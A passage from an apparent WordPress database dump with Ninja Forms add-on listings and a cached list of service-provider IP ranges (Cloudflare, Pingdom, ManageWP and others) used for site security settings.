Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]},{\"title\":\"ClickSend SMS\",\"image\":\"assets\\/img\\/add-ons\\/clicksend-sms.png\",\"content\":\"Get instant SMS notifications with every new WordPress form submission. Respond to leads faster and make more personal connections!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/clicksend-sms\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=ClickSend+SMS\",\"plugin\":\"ninja-forms-clicksend\\/ninja-forms-clicksend.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/clicksend-sms\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=ClickSend+SMS+Docs\",\"version\":\"3.0.1\",\"categories\":[{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Notification and Workflow\",\"slug\":\"notification-workflow\"}]},{\"title\":\"Twilio SMS\",\"image\":\"assets\\/img\\/add-ons\\/twilio-sms.png\",\"content\":\"Get instant SMS notifications with every new WordPress form submission. Respond to leads faster and make more personal connections!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/twilio\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Twilio+SMS\",\"plugin\":\"ninja-forms-twilio\\/ninja-forms-twilio.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/twilio\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Twilio+SMS+Docs\",\"version\":\"3.0.1\",\"categories\":[{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Notification and Workflow\",\"slug\":\"notification-workflow\"}]},{\"title\":\"Recurly\",\"image\":\"assets\\/img\\/add-ons\\/recurly.png\",\"content\":\"Subscription plans a part of your business model? Let your users subscribe from any WordPress form & make management easier with Recurly!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/recurly\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Recurly\",\"plugin\":\"ninja-forms-recurly\\/ninja-forms-recurly.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/recurly\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Recurly+Docs\",\"version\":\"3.0.4\",\"categories\":[{\"name\":\"Payment Gateways\",\"slug\":\"payment-gateways\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]},{\"title\":\"User Management\",\"image\":\"assets\\/img\\/add-ons\\/user-management.png\",\"content\":\"Allow your users to register, login, and manage their own profiles on your website. Customizable template forms for each, or design your own!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/user-management\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=User+Management\",\"plugin\":\"ninja-forms-user-management\\/ninja-forms-user-management.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/user-management\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=User+Management+Docs\",\"version\":\"3.0.12\",\"categories\":[{\"name\":\"Content Management\",\"slug\":\"content-management\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"User Management\",\"slug\":\"user-management\"}]},{\"title\":\"Save Progress\",\"image\":\"assets\\/img\\/add-ons\\/save-progress.png\",\"content\":\"Let your users save their work and reload it all when they have time to return. Don\'t lose out on valuable submissions for longer forms!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/save-progress\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Save+Progress\",\"plugin\":\"ninja-forms-save-progress\\/ninja-forms-save-progress.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/save-progress\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Save+Progress+Docs\",\"version\":\"3.0.25\",\"categories\":[{\"name\":\"Content Management\",\"slug\":\"content-management\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Form Function and Design\",\"slug\":\"form-function-design\"}]},{\"title\":\"EmailOctopus\",\"image\":\"assets\\/img\\/add-ons\\/emailoctopus.png\",\"content\":\"Pair WordPress\' best drag and drop form builder with your EmailOctopus account for incredibly effective signup forms. Easy, complete integration.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/emailoctopus\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=EmailOctopus\",\"plugin\":\"ninja-forms-emailoctopus\\/ninja-forms-emailoctopus.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/emailoctopus\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=EmailOctopus+Docs\",\"version\":\"3.0.0\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]},{\"title\":\"PipelineDeals CRM\",\"image\":\"assets\\/img\\/add-ons\\/pipelinedeals-crm.png\",\"content\":\"Complete, effortless integration with PipelineDeals CRM. Increase the flow of leads into your sales pipeline with upgraded lead generation forms!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/pipelinedeals-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=PipelineDeals+CRM\",\"plugin\":\"ninja-forms-zoho-crm\\/zoho-integration.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/pipelinedeals-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=PipelineDeals+CRM+Docs\",\"version\":\"3.0.1\",\"categories\":[{\"name\":\"CRM Integrations\",\"slug\":\"crm-integrations\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]},{\"title\":\"Highrise CRM\",\"image\":\"assets\\/img\\/add-ons\\/highrise-crm.png\",\"content\":\"Get more out of the functional simplicity of Highrise CRM with forms that can be designed from the ground up to maximize conversion. \",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/highrise-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Highrise+CRM\",\"plugin\":\"ninja-forms-highrise-crm\\/ninja-forms-highrise-crm.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/highrise-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Highrise+CRM+Docs\",\"version\":\"3.0.0\",\"categories\":[{\"name\":\"CRM Integrations\",\"slug\":\"crm-integrations\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]},{\"title\":\"ConvertKit\",\"image\":\"assets\\/img\\/add-ons\\/convertkit.png\",\"content\":\"Connect WordPress to your ConvertKit account with completely customizable opt-in forms. Watch your audience & sales grow like never before!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/convertkit\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=ConvertKit\",\"plugin\":\"ninja-forms-convertkit\\/ninja-forms-convertkit.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/convertkit\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=ConvertKit+Docs\",\"version\":\"3.1.1\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]},{\"title\":\"OnePageCRM\",\"image\":\"assets\\/img\\/add-ons\\/onepage-crm.png\",\"content\":\"Integrate WordPress with OnePage CRM seamlessly through highly customizable WordPress forms. Make better conversions <em>your<\\/em> Next Action!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/onepage-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=OnePageCRM\",\"plugin\":\"ninja-forms-onepage-crm\\/ninja-forms-onepage-crm.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/onepage-crm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=OnePageCRM+Docs\",\"version\":\"3.0.0\",\"categories\":[{\"name\":\"CRM Integrations\",\"slug\":\"crm-integrations\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]},{\"title\":\"ActiveCampaign\",\"image\":\"assets\\/img\\/add-ons\\/active-campaign.png\",\"content\":\"Design custom forms that link perfectly to your ActiveCampaign account for the ultimate in marketing automation. Better leads begin here!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/activecampaign\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=ActiveCampaign\",\"plugin\":\"ninja-forms-active-campaign\\/ninja-forms-active-campaign.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/activecampaign\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=ActiveCampaign+Docs\",\"version\":\"3.1.0\",\"categories\":[{\"name\":\"Email Marketing\",\"slug\":\"email-marketing\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Agency\",\"slug\":\"agency\"}]}]','no'),(435656,'show_comments_cookies_opt_in','1','yes'),(435657,'admin_email_lifespan','0','yes'),(439237,'disallowed_keys','','no'),(439238,'comment_previously_approved','','yes'),(439239,'auto_plugin_theme_update_emails','a:0:{}','no'),(439306,'ninja_forms_required_updates','a:1:{s:25:\"CacheFieldReconcilliation\";s:19:\"2020-09-28 01:08:16\";}','yes'),(439307,'ninja_forms_zuul','65','no'),(510376,'_site_transient_timeout_apto-db-ready-d941baefc6','1632315702','no'),(511257,'_site_transient_timeout_apto_provider_ips','1632425019','no'),(511258,'_site_transient_apto_provider_ips','a:2:{s:8:\"services\";a:12:{s:10:\"cloudflare\";a:3:{s:4:\"name\";s:10:\"CloudFlare\";s:4:\"type\";a:2:{i:0;s:11:\"performance\";i:1;s:8:\"security\";}s:3:\"ips\";a:2:{i:4;a:15:{i:0;s:15:\"173.245.48.0/20\";i:1;s:15:\"103.21.244.0/22\";i:2;s:15:\"103.22.200.0/22\";i:3;s:13:\"103.31.4.0/22\";i:4;s:15:\"141.101.64.0/18\";i:5;s:16:\"108.162.192.0/18\";i:6;s:15:\"190.93.240.0/20\";i:7;s:15:\"188.114.96.0/20\";i:8;s:16:\"197.234.240.0/22\";i:9;s:15:\"198.41.128.0/17\";i:10;s:14:\"162.158.0.0/15\";i:11;s:13:\"104.16.0.0/13\";i:12;s:13:\"104.24.0.0/14\";i:13;s:13:\"172.64.0.0/13\";i:14;s:13:\"131.0.72.0/22\";}i:6;a:7:{i:0;s:14:\"2400:cb00::/32\";i:1;s:14:\"2606:4700::/32\";i:2;s:14:\"2803:f800::/32\";i:3;s:14:\"2405:b500::/32\";i:4;s:14:\"2405:8100::/32\";i:5;s:14:\"2a06:98c0::/29\";i:6;s:14:\"2c0f:f248::/32\";}}}s:10:\"duckduckgo\";a:4:{s:4:\"name\";s:13:\"DuckDuckGoBot\";s:6:\"agents\";a:1:{i:0;s:11:\"DuckDuckBot\";}s:4:\"type\";a:1:{i:0;s:6:\"search\";}s:3:\"ips\";a:2:{i:4;a:12:{i:0;s:12:\"23.21.227.69\";i:1;s:12:\"40.88.21.235\";i:2;s:13:\"50.16.241.113\";i:3;s:13:\"50.16.241.114\";i:4;s:13:\"50.16.241.117\";i:5;s:13:\"50.16.247.234\";i:6;s:12:\"52.204.97.54\";i:7;s:11:\"52.5.190.19\";i:8;s:14:\"54.197.234.188\";i:9;s:14:\"54.208.100.253\";i:10;s:13:\"54.208.102.37\";i:11;s:10:\"107.21.1.8\";}i:6;a:0:{}}}s:8:\"gtmetrix\";a:3:{s:4:\"name\";s:8:\"GTMetrix\";s:4:\"type\";a:1:{i:0;s:11:\"performance\";}s:3:\"ips\";a:2:{i:4;a:66:{i:0;s:14:\"52.162.212.163\";i:1;s:12:\"13.78.216.56\";i:2;s:13:\"65.52.113.236\";i:3;s:14:\"52.229.122.240\";i:4;s:14:\"172.255.48.147\";i:5;s:14:\"172.255.48.146\";i:6;s:14:\"172.255.48.145\";i:7;s:14:\"172.255.48.144\";i:8;s:14:\"172.255.48.143\";i:9;s:14:\"172.255.48.142\";i:10;s:14:\"24.109.190.162\";i:11;s:14:\"172.255.48.141\";i:12;s:14:\"172.255.48.140\";i:13;s:14:\"172.255.48.139\";i:14;s:14:\"172.255.48.138\";i:15;s:14:\"172.255.48.137\";i:16;s:14:\"172.255.48.136\";i:17;s:14:\"172.255.48.135\";i:18;s:14:\"172.255.48.134\";i:19;s:14:\"172.255.48.133\";i:20;s:14:\"172.255.48.132\";i:21;s:14:\"172.255.48.131\";i:22;s:14:\"172.255.48.130\";i:23;s:14:\"104.214.48.247\";i:24;s:13:\"40.74.243.176\";i:25;s:12:\"40.74.243.13\";i:26;s:13:\"40.74.242.253\";i:27;s:11:\"13.85.82.26\";i:28;s:11:\"13.85.24.90\";i:29;s:11:\"13.85.24.83\";i:30;s:10:\"13.66.7.11\";i:31;s:14:\"104.214.72.101\";i:32;s:14:\"191.235.99.221\";i:33;s:14:\"191.235.98.164\";i:34;s:11:\"104.41.2.19\";i:35;s:14:\"104.211.165.53\";i:36;s:13:\"104.211.143.8\";i:37;s:13:\"172.255.61.40\";i:38;s:13:\"172.255.61.39\";i:39;s:13:\"172.255.61.38\";i:40;s:13:\"172.255.61.37\";i:41;s:13:\"172.255.61.36\";i:42;s:13:\"172.255.61.35\";i:43;s:13:\"172.255.61.34\";i:44;s:12:\"20.52.146.77\";i:45;s:12:\"65.52.36.250\";i:46;s:12:\"70.37.83.240\";i:47;s:15:\"104.214.110.135\";i:48;s:14:\"157.55.189.189\";i:49;s:14:\"191.232.194.51\";i:50;s:12:\"52.175.57.81\";i:51;s:14:\"52.237.236.145\";i:52;s:13:\"52.237.250.73\";i:53;s:14:\"52.237.235.185\";i:54;s:12:\"40.83.89.214\";i:55;s:13:\"40.123.218.94\";i:56;s:14:\"102.133.169.66\";i:57;s:12:\"52.172.14.87\";i:58;s:14:\"52.231.199.170\";i:59;s:14:\"52.246.165.153\";i:60;s:12:\"13.76.97.224\";i:61;s:11:\"13.53.162.7\";i:62;s:11:\"20.52.36.49\";i:63;s:13:\"20.188.63.151\";i:64;s:14:\"51.144.102.233\";i:65;s:12:\"23.96.34.105\";}i:6;a:0:{}}}s:10:\"icontrolwp\";a:4:{s:4:\"name\";s:10:\"iControlWP\";s:6:\"agents\";a:1:{i:0;s:13:\"iControlWPApp\";}s:4:\"type\";a:1:{i:0;s:18:\"wp_site_management\";}s:3:\"ips\";a:2:{i:4;a:5:{i:0;s:13:\"23.253.32.180\";i:1;s:12:\"23.253.56.59\";i:2;s:13:\"23.253.62.185\";i:3;s:15:\"104.130.217.172\";i:4;s:12:\"198.61.176.9\";}i:6;a:8:{i:0;s:39:\"2001:4801:7817:0072:ca75:cc9b:ff10:4699\";i:1;s:37:\"2001:4801:7817:72:ca75:cc9b:ff10:4699\";i:2;s:39:\"2001:4801:7822:0103:be76:4eff:fe10:89a9\";i:3;s:38:\"2001:4801:7822:103:be76:4eff:fe10:89a9\";i:4;s:39:\"2001:4801:7824:0101:ca75:cc9b:ff10:a7b2\";i:5;s:38:\"2001:4801:7824:101:ca75:cc9b:ff10:a7b2\";i:6;s:39:\"2001:4801:7828:0101:be76:4eff:fe11:9cd6\";i:7;s:38:\"2001:4801:7828:101:be76:4eff:fe11:9cd6\";}}}s:8:\"managewp\";a:3:{s:4:\"name\";s:8:\"ManageWP\";s:4:\"type\";a:1:{i:0;s:18:\"wp_site_management\";}s:3:\"ips\";a:2:{i:4;a:51:{i:0;s:13:\"34.211.180.66\";i:1;s:12:\"54.70.65.107\";i:2;s:12:\"34.210.224.7\";i:3;s:11:\"52.41.5.108\";i:4;s:12:\"52.35.72.129\";i:5;s:14:\"35.162.254.253\";i:6;s:12:\"52.11.12.231\";i:7;s:11:\"52.11.29.70\";i:8;s:12:\"52.11.54.161\";i:9;s:13:\"52.24.142.159\";i:10;s:13:\"52.25.191.255\";i:11;s:13:\"52.27.181.126\";i:12;s:13:\"52.34.126.117\";i:13;s:12:\"52.34.254.47\";i:14;s:11:\"52.35.82.99\";i:15;s:11:\"52.36.28.80\";i:16;s:12:\"52.38.106.97\";i:17;s:13:\"52.39.177.152\";i:18;s:13:\"52.41.230.148\";i:19;s:12:\"52.41.237.12\";i:20;s:13:\"52.42.126.166\";i:21;s:11:\"52.43.13.71\";i:22;s:12:\"52.43.76.224\";i:23;s:12:\"52.88.96.110\";i:24;s:12:\"52.89.155.51\";i:25;s:13:\"54.148.73.118\";i:26;s:13:\"54.186.37.105\";i:27;s:12:\"54.187.92.57\";i:28;s:12:\"54.191.32.65\";i:29;s:12:\"54.191.67.23\";i:30;s:13:\"54.191.80.119\";i:31;s:14:\"54.191.135.209\";i:32;s:14:\"54.191.136.176\";i:33;s:13:\"54.191.137.17\";i:34;s:13:\"54.191.148.85\";i:35;s:12:\"54.191.149.8\";i:36;s:12:\"52.26.122.21\";i:37;s:12:\"52.24.187.29\";i:38;s:12:\"52.89.85.107\";i:39;s:14:\"54.186.128.167\";i:40;s:13:\"54.191.40.136\";i:41;s:11:\"52.24.62.11\";i:42;s:13:\"52.88.119.122\";i:43;s:14:\"54.191.148.225\";i:44;s:13:\"54.191.151.18\";i:45;s:12:\"52.89.94.121\";i:46;s:13:\"52.25.116.116\";i:47;s:13:\"52.88.215.225\";i:48;s:14:\"54.186.143.184\";i:49;s:13:\"52.88.197.180\";i:50;s:13:\"52.27.171.126\";}i:6;a:0:{}}}s:8:\"nodeping\";a:3:{s:4:\"name\";s:8:\"NodePing\";s:4:\"type\";a:1:{i:0;s:6:\"uptime\";}s:3:\"ips\";a:2:{i:4;a:29:{i:1;s:15:\"104.247.192.170\";i:3;s:12:\"136.175.8.15\";i:5;s:14:\"107.161.26.107\";i:7;s:13:\"172.105.6.187\";i:9;s:14:\"173.248.161.42\";i:11;s:13:\"66.11.113.250\";i:13;s:13:\"172.93.197.58\";i:15;s:13:\"172.82.138.70\";i:17;s:15:\"209.205.207.243\";i:19;s:12:\"66.23.202.26\";i:21;s:11:\"64.79.76.50\";i:23;s:14:\"208.82.130.170\";i:25;s:15:\"192.154.102.130\";i:27;s:13:\"5.226.139.158\";i:29;s:14:\"195.154.167.97\";i:31;s:15:\"217.182.201.227\";i:33;s:13:\"37.252.125.64\";i:35;s:12:\"54.36.110.96\";i:37;s:14:\"78.110.173.218\";i:38;s:13:\"95.216.64.250\";i:41;s:13:\"144.48.37.241\";i:43;s:14:\"112.213.38.162\";i:45;s:15:\"172.104.181.238\";i:47;s:11:\"103.6.85.58\";i:49;s:14:\"180.149.230.17\";i:51;s:13:\"203.29.240.44\";i:52;s:15:\"190.104.217.135\";i:53;s:13:\"54.232.120.40\";i:55;s:14:\"162.254.202.35\";}i:6;a:27:{i:0;s:19:\"2607:3f00:11:21::10\";i:2;s:16:\"2605:8340:0:1::2\";i:4;s:19:\"2604:180:1:6e::83b5\";i:6;s:30:\"2600:3c04::f03c:92ff:fe9b:dd03\";i:8;s:19:\"2607:fc88:100:40::2\";i:10;s:20:\"2602:ffc5:105:408::2\";i:12;s:33:\"2602:ffc8:1:14:225:90ff:fee6:8f90\";i:14;s:17:\"2607:3f00:1:a::10\";i:16;s:16:\"2a06:8640:198::2\";i:18;s:21:\"2605:9f80:c000:127::2\";i:20;s:17:\"2001:1828:0:f6::2\";i:22;s:17:\"2604:bf00:214::10\";i:24;s:36:\"2606:c700:4020:17:225:90ff:fe50:390a\";i:26;s:18:\"2a01:4020:1:26::10\";i:28;s:21:\"2001:bc8:2327:110::10\";i:30;s:21:\"2001:41d0:602:4e3::10\";i:32;s:32:\"2a02:2770:5:0:21a:4aff:fe1a:c131\";i:34;s:22:\"2001:41d0:700:1360::10\";i:36;s:21:\"2a01:a500:2604:10::10\";i:39;s:18:\"2a01:4f9:2b:105::2\";i:40;s:34:\"2404:f780:2:950:216:3cff:feb8:ab8e\";i:42;s:32:\"2404:9400:2:0:216:3eff:fee1:bce0\";i:44;s:30:\"2400:8901::f03c:91ff:feb9:fbf4\";i:46;s:21:\"2403:2500:8000:1::ce6\";i:48;s:22:\"2406:d500:9::7a91:9b75\";i:50;s:32:\"2404:9400:4:0:216:3eff:fee1:3c1b\";i:54;s:35:\"2604:bc80:8001:3c:225:90ff:fee5:5c6\";}}}s:10:\"paypal_ipn\";a:3:{s:4:\"name\";s:10:\"PayPal IPN\";s:4:\"type\";a:1:{i:0;s:8:\"payments\";}s:3:\"ips\";a:2:{i:4;a:11:{i:0;s:13:\"66.211.170.66\";i:1;s:10:\"173.0.81.1\";i:2;s:13:\"173.0.81.0/24\";i:3;s:11:\"173.0.81.33\";i:4;s:11:\"173.0.81.65\";i:5;s:12:\"173.0.81.140\";i:6;s:13:\"64.4.240.0/21\";i:7;s:13:\"64.4.248.0/22\";i:8;s:15:\"66.211.168.0/22\";i:9;s:13:\"173.0.80.0/20\";i:10;s:14:\"91.243.72.0/23\";}i:6;a:0:{}}}s:7:\"pingdom\";a:3:{s:4:\"name\";s:7:\"Pingdom\";s:4:\"type\";a:1:{i:0;s:6:\"uptime\";}s:3:\"ips\";a:2:{i:4;a:116:{i:0;s:13:\"5.172.196.188\";i:1;s:14:\"13.232.220.164\";i:2;s:10:\"23.22.2.46\";i:3;s:13:\"23.83.129.219\";i:4;s:11:\"23.92.127.2\";i:5;s:12:\"23.106.37.99\";i:6;s:13:\"23.111.152.74\";i:7;s:14:\"23.111.159.174\";i:8;s:13:\"37.252.231.50\";i:9;s:14:\"43.225.198.122\";i:10;s:12:\"43.229.84.12\";i:11;s:11:\"46.20.45.18\";i:12;s:13:\"46.246.122.10\";i:13;s:11:\"50.2.185.66\";i:14;s:13:\"50.16.153.186\";i:15;s:11:\"52.0.204.16\";i:16;s:12:\"52.24.42.103\";i:17;s:12:\"52.48.244.35\";i:18;s:12:\"52.52.34.158\";i:19;s:12:\"52.52.95.213\";i:20;s:13:\"52.52.118.192\";i:21;s:12:\"52.57.132.90\";i:22;s:12:\"52.59.46.112\";i:23;s:13:\"52.59.147.246\";i:24;s:11:\"52.62.12.49\";i:25;s:11:\"52.63.142.2\";i:26;s:13:\"52.63.164.147\";i:27;s:12:\"52.63.167.55\";i:28;s:12:\"52.67.148.55\";i:29;s:13:\"52.73.209.122\";i:30;s:11:\"52.89.43.70\";i:31;s:14:\"52.194.115.181\";i:32;s:13:\"52.197.31.124\";i:33;s:14:\"52.197.224.235\";i:34;s:13:\"52.198.25.184\";i:35;s:12:\"52.201.3.199\";i:36;s:13:\"52.209.34.226\";i:37;s:14:\"52.209.186.226\";i:38;s:14:\"52.210.232.124\";i:39;s:12:\"54.68.48.199\";i:40;s:12:\"54.70.202.58\";i:41;s:13:\"54.94.206.111\";i:42;s:13:\"64.237.49.203\";i:43;s:11:\"64.237.55.3\";i:44;s:14:\"66.165.229.130\";i:45;s:14:\"66.165.233.234\";i:46;s:12:\"72.46.130.18\";i:47;s:12:\"72.46.131.10\";i:48;s:13:\"76.72.167.154\";i:49;s:13:\"76.72.172.208\";i:50;s:14:\"76.164.234.106\";i:51;s:14:\"76.164.234.130\";i:52;s:13:\"82.103.136.16\";i:53;s:14:\"82.103.139.165\";i:54;s:14:\"82.103.145.126\";i:55;s:14:\"85.195.116.134\";i:56;s:14:\"89.163.146.247\";i:57;s:14:\"89.163.242.206\";i:58;s:12:\"94.75.211.73\";i:59;s:12:\"94.75.211.74\";i:60;s:13:\"94.247.174.83\";i:61;s:12:\"96.47.225.18\";i:62;s:13:\"103.10.197.10\";i:63;s:14:\"103.47.211.210\";i:64;s:14:\"104.129.24.154\";i:65;s:13:\"104.129.30.18\";i:66;s:14:\"107.182.234.77\";i:67;s:14:\"148.72.170.233\";i:68;s:13:\"148.72.171.17\";i:69;s:14:\"151.106.52.134\";i:70;s:13:\"159.122.168.9\";i:71;s:13:\"162.208.48.94\";i:72;s:13:\"162.218.67.34\";i:73;s:15:\"162.253.128.178\";i:74;s:12:\"168.1.203.46\";i:75;s:11:\"169.51.2.18\";i:76;s:13:\"169.54.70.214\";i:77;s:14:\"169.56.174.151\";i:78;s:14:\"172.241.112.86\";i:79;s:14:\"173.248.147.18\";i:80;s:15:\"173.254.206.242\";i:81;s:14:\"174.34.156.130\";i:82;s:13:\"175.45.132.20\";i:83;s:15:\"178.162.206.244\";i:84;s:13:\"178.255.152.2\";i:85;s:13:\"178.255.153.2\";i:86;s:13:\"179.50.12.212\";i:87;s:14:\"184.75.208.210\";i:88;s:13:\"184.75.209.18\";i:89;s:13:\"184.75.210.90\";i:90;s:14:\"184.75.210.226\";i:91;s:13:\"184.75.214.66\";i:92;s:13:\"184.75.214.98\";i:93;s:14:\"185.39.146.214\";i:94;s:14:\"185.39.146.215\";i:95;s:12:\"185.70.76.23\";i:96;s:11:\"185.93.3.92\";i:97;s:14:\"185.136.156.82\";i:98;s:14:\"185.152.65.167\";i:99;s:13:\"185.180.12.65\";i:100;s:14:\"185.246.208.82\";i:101;s:14:\"188.172.252.34\";i:102;s:13:\"190.120.230.7\";i:103;s:14:\"196.240.207.18\";i:104;s:14:\"196.244.191.18\";i:105;s:14:\"196.245.151.42\";i:106;s:13:\"199.87.228.66\";i:107;s:14:\"200.58.101.248\";i:108;s:11:\"201.33.21.5\";i:109;s:14:\"207.244.80.239\";i:110;s:14:\"209.58.139.193\";i:111;s:14:\"209.58.139.194\";i:112;s:12:\"209.95.50.14\";i:113;s:12:\"212.78.83.12\";i:114;s:12:\"212.78.83.16\";i:115;s:14:\"213.198.67.206\";}i:6;a:67:{i:0;s:20:\"2001:df0:a6:31::4080\";i:1;s:23:\"2001:19f0:200:125d::426\";i:2;s:37:\"2001:19f0:200:40cf:225:90ff:fed5:9aea\";i:3;s:25:\"2001:1af8:4400:a056::4052\";i:4;s:25:\"2001:1af8:4400:a056::4053\";i:5;s:23:\"2001:4ba0:ffa5:ed::4003\";i:6;s:24:\"2001:4ba0:ffa5:1d5::4004\";i:7;s:20:\"2001:4ba0:ffe2:22::1\";i:8;s:23:\"2401:c900:1401:71::4078\";i:9;s:24:\"2401:c900:1601:1b4::4071\";i:10;s:19:\"2401:e780:1:91::495\";i:11;s:30:\"2403:f000:1:100:4096:597:1:100\";i:12;s:24:\"2406:da14:48a:7b03::4049\";i:13;s:24:\"2406:da1a:b0a:bf02::4050\";i:14;s:24:\"2600:1f1e:d7c:fd03::4027\";i:15;s:24:\"2600:1f1e:d7c:fd05::4028\";i:16;s:19:\"2604:4500:5:a::4005\";i:17;s:20:\"2604:4500:5:a0::4033\";i:18;s:21:\"2604:4500:8:120::4032\";i:19;s:20:\"2604:4500:9:5d::4031\";i:20;s:23:\"2604:6600:fdc0:12::4066\";i:21;s:19:\"2604:b480:fff9::444\";i:22;s:20:\"2604:b480:fffa::4015\";i:23;s:18:\"2605:6f80:0:f::462\";i:24;s:27:\"2605:fe80:2100:a00f:4::4045\";i:25;s:27:\"2605:fe80:2100:a00f:5::4046\";i:26;s:19:\"2606:6080:1001::439\";i:27;s:21:\"2606:6080:1001:1::459\";i:28;s:21:\"2606:6080:1001:2::446\";i:29;s:21:\"2606:6080:1001:3::447\";i:30;s:21:\"2606:6080:1001:4::448\";i:31;s:24:\"2606:9880:f000:4:5::4047\";i:32;s:21:\"2607:2200:0:2347::460\";i:33;s:22:\"2607:2200:0:2347::4016\";i:34;s:22:\"2607:2200:0:2347::4061\";i:35;s:23:\"2607:f0d0:3701:f2::4079\";i:36;s:21:\"2607:fc88:100:26::421\";i:37;s:24:\"2607:fcd0:100:8d01::4010\";i:38;s:25:\"2607